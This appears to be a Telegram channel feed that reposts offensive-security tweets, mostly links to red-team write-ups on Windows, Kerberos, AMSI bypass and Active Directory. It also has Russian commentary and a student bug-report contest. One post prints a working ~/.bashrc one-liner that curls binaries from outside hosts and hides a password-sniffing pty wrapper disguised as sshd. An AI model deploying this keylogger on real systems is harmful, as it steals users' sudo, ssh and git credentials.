😈 [ Viking @Vikingfr ]
How named pipes and Powershell could be used for creating Windows bind / reverse shell re-using Windows SMB port ? I show you in this blog post 😉
🔗 https://v1k1ngfr.github.io/fuegoshell/
🐥 [ tweet ]
How named pipes and Powershell could be used for creating Windows bind / reverse shell re-using Windows SMB port ? I show you in this blog post 😉
🔗 https://v1k1ngfr.github.io/fuegoshell/
🐥 [ tweet ]
👍10
😈 [ ap @decoder_it ]
#SilverPotato works also with Kerberos using @tiraniddo I mentioned in my latest post trick.
You will get an AP-REQ with SPN of the desired target server. Relaying is now just one step away..
🐥 [ tweet ]
#SilverPotato works also with Kerberos using @tiraniddo I mentioned in my latest post trick.
You will get an AP-REQ with SPN of the desired target server. Relaying is now just one step away..
🐥 [ tweet ]
👍5
😈 [ Raphael DUCOM @rducom ]
@techspence Or even better, use our automated loop:
🔗 https://github.com/LuccaSA/PingCastle-Notify
Credits: @mpgn_x64
🐥 [ tweet ]
This is such an awesome writeup, but it's missing one thing - remediation steps
Some AD admins may know how to fix these issues, but it's fair to assume some do not.
I'd also highly recommend using PingCastle by @mysmartlogon as it audits most of this and more.
@techspence Or even better, use our automated loop:
🔗 https://github.com/LuccaSA/PingCastle-Notify
Credits: @mpgn_x64
🐥 [ tweet ]
никогда не пользовался пингкаслом, но выглядит как то, что можно рекомендовать в роли бомж-чекапа ад на регулярной основе🔥2👍1🥱1
😈 [ Elliot @ElliotKillick ]
Reverse engineering the Windows 10 parallel loader is challenging but interesting work. I recently fully reversed the pivotal LdrpDrainWorkQueue function and I'm just now working on LdrpLoadDllInternal plus others
🔗 https://github.com/ElliotKillick/windows-vs-linux-loader-architecture#reverse-engineered-windows-loader-functions
🐥 [ tweet ]
Reverse engineering the Windows 10 parallel loader is challenging but interesting work. I recently fully reversed the pivotal LdrpDrainWorkQueue function and I'm just now working on LdrpLoadDllInternal plus others
🔗 https://github.com/ElliotKillick/windows-vs-linux-loader-architecture#reverse-engineered-windows-loader-functions
🐥 [ tweet ]
🔥4
I’ve missed the moment when the Ascension Endgame has been retired on @hackthebox_eu, but finally, here’s my write-up:
🔗 https://snovvcrash.rocks/2024/04/30/htb-ascension.html
This blog has been waiting its time in my drafts for almost 3 years now, and for me, this Endgame is still the best advanced lab on #HackTheBox. Many thanks to @egre55, @0_trx and all the @hackthebox_eu team!
P. S. It’s so cringe to read your own 3-year-old notes 🤦🏻♂️😅
🐥 [ tweet ]
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🥱2🔥1
Offensive Xwitter
😈 [ ap @decoder_it ] #SilverPotato works also with Kerberos using @tiraniddo I mentioned in my latest post trick. You will get an AP-REQ with SPN of the desired target server. Relaying is now just one step away.. 🐥 [ tweet ]
😈 [ James Forshaw @tiraniddo ]
Taking a cue from @D1iv3 and @decoder_it's work on inducing authentication out of remote DCOM I thought I'd quickly write up a post about getting Kerberos authentication out of the initial OXID resolving call.
🔗 https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
🐥 [ tweet ]
Taking a cue from @D1iv3 and @decoder_it's work on inducing authentication out of remote DCOM I thought I'd quickly write up a post about getting Kerberos authentication out of the initial OXID resolving call.
🔗 https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
🐥 [ tweet ]
👍2🤯1
😈 [ Hope Walker @Icemoonhsv ]
Published part 2 of Manual LDAP Querying. This blog covers additional topics like user account control, password attributes, domain trusts, and more.
🔗 https://posts.specterops.io/manual-ldap-querying-part-2-8a65099e12e3
🐥 [ tweet ]
Published part 2 of Manual LDAP Querying. This blog covers additional topics like user account control, password attributes, domain trusts, and more.
🔗 https://posts.specterops.io/manual-ldap-querying-part-2-8a65099e12e3
🐥 [ tweet ]
👍4
😈 [ BC Security @bcsecurity ]
Missed the IronPython workshop? No worries, we have you covered with the recording posted to YouTube!
🔗 https://youtu.be/9XI1stt3gdE?si=drwkE6th39vCZlaj
🐥 [ tweet ]
Missed the IronPython workshop? No worries, we have you covered with the recording posted to YouTube!
🔗 https://youtu.be/9XI1stt3gdE?si=drwkE6th39vCZlaj
🐥 [ tweet ]
YouTube
Introduction to Offensive IronPython - April 2024
🔥6👍1
😈 [ OffSec @offsectraining ]
This blog introduces a new 0day technique discovered by OffSec Technical Trainer Victor “Vixx” Khoury, the process he used to exploit it, and the proof of concept code to bypass AMSI in PowerShell 5.1 and PowerShell 7.4:
🔗 https://offs.ec/44owQR3
🐥 [ tweet ]
This blog introduces a new 0day technique discovered by OffSec Technical Trainer Victor “Vixx” Khoury, the process he used to exploit it, and the proof of concept code to bypass AMSI in PowerShell 5.1 and PowerShell 7.4:
🔗 https://offs.ec/44owQR3
🐥 [ tweet ]
🔥3🥱2😁1
Forwarded from true_security
эту фичу можно использовать для получения кред из lsass в совокупности с описанными тут методами
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/
👍10
Как относитесь к рекламам на канале?
Anonymous Poll
65%
Жить можно, все равно автор сас 🥰
35%
Резко негативно, атписка 🤬
👍1🥱1
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/noscript" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
🔥15😢1
😈 [ Rasta Mouse @_RastaMouse ]
[BLOG]
I integrated some Rust artifacts directly into CS 😱
Here's the blog post demonstrating how you can make your own.
🔗 https://rastamouse.me/custom-beacon-artifacts/
🐥 [ tweet ][ quote ]
[BLOG]
I integrated some Rust artifacts directly into CS 😱
Here's the blog post demonstrating how you can make your own.
🔗 https://rastamouse.me/custom-beacon-artifacts/
🐥 [ tweet ][ quote ]
🔥6👍1🥱1
Forwarded from Young Researchers Reward Program
Наши друзья из Positive Technologies предоставили нам 6 проходок на PhD для проведения благотворительного конкурса. Читаем инфу ниже!
Вы пишете обезличенный отчет, в котором рассказываете о своей самой интересной баге, отправляете отчет в бота. Позже команда жюри оценит его, а уже 17 мая мы свяжемся с участниками и отдадим их заслуженные призы).
Жюри выберет топ 6 участников для полноценной или частичной компенсации билетов на PositiveHackDays и обратно!
1. Являться школьником/студентом бакалавриата или специалитета
2. Отправить файл формата
.docx или .pdf с описанием бага в нашего бота (В описании к файлу должно содежаться слово Заявка)6го мая в 15:00 - Старт приема заявок
13 мая 15:00 - Закрытие приема заявок
17 мая 17:00 Оглашение результатов
1. Подробность описания (3 балла)
2. Сложность эксплуатации (2 балла)
3. Нестандартный подход и креативность (3 балла)
4. Вау-эффект (субъективный параметр на усмотрение членов жюри) (2 балла)
@SidneyJob (Пентестер, автор канала Заметочки SidneyJob)
@curiv (Пентестер, активист ИБ сообщества, основатель @dc7342, @permctf, автор канала @pathsecure)
@cyrus_0x00 (Пентестер в компании DeteAct
@brotherok (Багхантер, автора канала ШКИБыть)
@bughunter_circuit (Автор канала о багхантинге)
@romanpnn (Автор канала Пакет Безопасности)
@wr3dmast3r (Пентестер, автор канала wr3dmast3r vs pentest)
@r00t_owl (Директор департамента противодействия киберугрозам, автор канала PRO:PENTEST)
<конечный список жюри уточняется>
Бюджет на оплату дороги для всех участников - 120 тысяч. Мы тратим весь планируемый бюджет, в том числе, в счет компенсации оплаты дороги другим победителям.
📃 Что будет с отчетами?
Планируется опубликовать отчеты победителей (при согласии автора)
👉 Важная деталь: Жюри и бюджет формируется независимыми инициативными участниками русскоязычного ИБ сообщества. Конкурс следует воспринимать как благотворительность в отношении перспективных молодых талантов. Мы убеждены, что за такими специалистами находится будущее ИБ сообщества.
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Positive Technologies
Уже более 20 лет наша основная задача — предотвращать хакерские атаки до того, как они причинят неприемлемый ущерб бизнесу и целым странам.
Регистрация в перечне РКН: https://knd.gov.ru/license?id=673b47eab7aeb106ceff4f97®istryType=bloggersPermission
Регистрация в перечне РКН: https://knd.gov.ru/license?id=673b47eab7aeb106ceff4f97®istryType=bloggersPermission
👍6🥱2🔥1
😈 [ Synacktiv @Synacktiv ]
In his latest blogpost, @yaumn_ analyzes MDI's detection of PKINIT authentication, explains how to bypass it and releases Invoke-RunAsWithCert, a tool to perform Kerberos authentication via PKINIT with the Windows API from a non domain-joined machine.
🔗 https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
🐥 [ tweet ]
In his latest blogpost, @yaumn_ analyzes MDI's detection of PKINIT authentication, explains how to bypass it and releases Invoke-RunAsWithCert, a tool to perform Kerberos authentication via PKINIT with the Windows API from a non domain-joined machine.
🔗 https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
🐥 [ tweet ]
🔥6🤔1
😈 [ Oddvar Moe @Oddvarmoe ]
Created a noscript using ADExplorersnapshot for dumping interesting information from AD into text files. Info such as active server accounts, sccm, printers, laps passwords, asreproast, plaintext password attributes +++
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/43
Decided to go with
🐥 [ tweet ]
Created a noscript using ADExplorersnapshot for dumping interesting information from AD into text files. Info such as active server accounts, sccm, printers, laps passwords, asreproast, plaintext password attributes +++
🔗 https://github.com/c3c/ADExplorerSnapshot.py/pull/43
Decided to go with
|| as a separator on the out files. Should be easy to parse with cut -d "|"🐥 [ tweet ]
👍7
🔥6👍4